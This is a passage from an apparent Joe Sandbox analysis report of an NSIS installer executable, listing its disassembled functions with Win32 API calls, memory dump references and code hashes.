                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,benevolently Setup: Installing), ref: 00404906
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                    • String ID: %u.%u%s%s$benevolently Setup: Installing
                                                                                                                                                                                    • API String ID: 3540041739-845447607
                                                                                                                                                                                    • Opcode ID: 9b3151ba7cee540e98112a4d3c0185064291859b30378dd226bea9325ccc70c9
                                                                                                                                                                                    • Instruction ID: 46e1028d5dd9cf3fa3a12b124fa319e283dc00677a7b855ac62dacd231200cde
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b3151ba7cee540e98112a4d3c0185064291859b30378dd226bea9325ccc70c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D11E477A041282BEB0075699C41EBF3298DB82374F24463BFE65F21D1E979CC1246E9
                                                                                                                                                                                    Function 00401D95 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(?), ref: 00401D98
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(0040B820), ref: 00401E1A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                                                                    • Opcode ID: 4e723180d0b3fa804a5576cd7c509fc044a30b7d9b685e9650bac6fd0e0bc28f
                                                                                                                                                                                    • Instruction ID: e9269c0f41cd5a79e17a17131fa0488204b4df503fc5c3e11bd14e9e74a55962
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e723180d0b3fa804a5576cd7c509fc044a30b7d9b685e9650bac6fd0e0bc28f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 24014072944344AEE7006BB4AE49BA97FE8EB15705F109439F141B61F2CB790405CF6D
                                                                                                                                                                                    Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?), ref: 00401D3F
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                                                                                                                                    • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                    • Opcode ID: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
                                                                                                                                                                                    • Instruction ID: b94dd0b2fc2efe961c915ac3dbaedcbaa59703da1128c811c259d0727350af9e
                                                                                                                                                                                    • Opcode Fuzzy Hash: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EF0FFB2600515BFDB00EBA4DE88DAFB7BCEB44301B04447AF645F2191CA748D018B38
                                                                                                                                                                                    Function 004023D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000023,00000011,00000002), ref: 0040241B
                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000000,00000011,00000002), ref: 00402458
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa33B1.tmp,00000000,00000011,00000002), ref: 0040253C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseValuelstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsa33B1.tmp
                                                                                                                                                                                    • API String ID: 2655323295-2109763640
                                                                                                                                                                                    • Opcode ID: 0b155a889f0a1852a4c8b5c80891aed8b0995d715a5fa6eccbfd1d5d818aefb1
                                                                                                                                                                                    • Instruction ID: f3bc197a49376025d104d1766b7c26e04d62aafcfa214307c08bf0afb556c6f3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b155a889f0a1852a4c8b5c80891aed8b0995d715a5fa6eccbfd1d5d818aefb1
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD117271F00215BEDF10AFA59E89A9E7A74DB54314F20403AF908B61D1CAB84D419B68
                                                                                                                                                                                    Function 004058FD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00405903
                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 0040590C
                                                                                                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 0040591D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004058FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 2659869361-3355392842
                                                                                                                                                                                    • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                                                                                                                                                    • Instruction ID: 647ad7e742d71b16062aa4f61d1124f0b3f0fcedfae467302285f0529c6cb9e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46D0C9A2606A317AD21227159C09EDB6A4CCF57755B054076F640B61A1CA7C4D428BFE
                                                                                                                                                                                    Function 00402BB4 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C22
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C43
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$Enum
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 464197530-0
                                                                                                                                                                                    • Opcode ID: 11be2661f8599cd0237f1c1554e4f8b4188825d64962de0b1740bf644c97f38e
                                                                                                                                                                                    • Instruction ID: b62f4967d327be975f6bbb281b4945b449d6b6e398a7fc8ef6fb9c274ae0afe8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11be2661f8599cd0237f1c1554e4f8b4188825d64962de0b1740bf644c97f38e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A118832500109BBEF01AF91CF09B9E3B79EF08341F104036BA05B50E0E7B4EE52AB68
                                                                                                                                                                                    Function 00402CE4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,00402EC4,00000001), ref: 00402CF7
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402D15
                                                                                                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402D40
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                    • Opcode ID: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                                                                                                                                                                                    • Instruction ID: 5343e4f3fd542578671bd54a8d6f819db7b5394acccd132b40ed42660498aa91
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F05430601521EBC7207F24FE8CA8F7A64BB08B11791047AF445B21F4DBB448C28B9C
                                                                                                                                                                                    Function 00405000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040502F
                                                                                                                                                                                    • CallWindowProcA.USER32(?,?,?,?), ref: 00405080
                                                                                                                                                                                      • Part of subcall function 00404072: SendMessageA.USER32(0001044A,00000000,00000000,00000000), ref: 00404084
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                    • Opcode ID: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                                                                                                                                                                                    • Instruction ID: 2f0027df7ddfe28b71d6e39f600ecebaf2ba5c74aec8f2e947ae9809186c917a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48017171500609ABDF205F51DD80E6F3B65EB84754F14403BFA01751D2C77A8CA29F9A
                                                                                                                                                                                    Function 004059EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,benevolently Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                                                                                                                                                                                      • Part of subcall function 00405996: CharNextA.USER32(?,?,0042BC78,?,00405A02,0042BC78,0042BC78,761F3410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A4
                                                                                                                                                                                      • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
                                                                                                                                                                                      • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD
                                                                                                                                                                                    • lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,761F3410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A3E
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,761F3410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,761F3410,C:\Users\user\AppData\Local\Temp\), ref: 00405A4E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004059EB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 3248276644-3355392842
                                                                                                                                                                                    • Opcode ID: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
                                                                                                                                                                                    • Instruction ID: 1f06baf1138d21f74630751e728cacf5283a8138a78bcc2982ba797f27b9272c
                                                                                                                                                                                    • Opcode Fuzzy Hash: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F0C831315DA256C622323A1D45AAF1B45CE87338709477FF891B12D2EB3C89439EBD
                                                                                                                                                                                    Function 00403720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,761F3410,00000000,C:\Users\user\AppData\Local\Temp\,004036F8,00403512,?,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                                                                    • GlobalFree.KERNEL32(004ABD58), ref: 00403741
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403720
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 1100898210-3355392842
                                                                                                                                                                                    • Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                                                                                                                                                                                    • Instruction ID: 7d8ce370987dd57b7bf148727d206b09ac62311aee63c146eb442539f55f5a8e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 39E0C27391212097C7313F54EE0871ABBA86F46B22F0A403AE8407B26487745C428BCC
                                                                                                                                                                                    Function 00405944 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\asXlZG3aW6.exe,C:\Users\user\Desktop\asXlZG3aW6.exe,80000000,00000003), ref: 0040594A
                                                                                                                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\asXlZG3aW6.exe,C:\Users\user\Desktop\asXlZG3aW6.exe,80000000,00000003), ref: 00405958
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
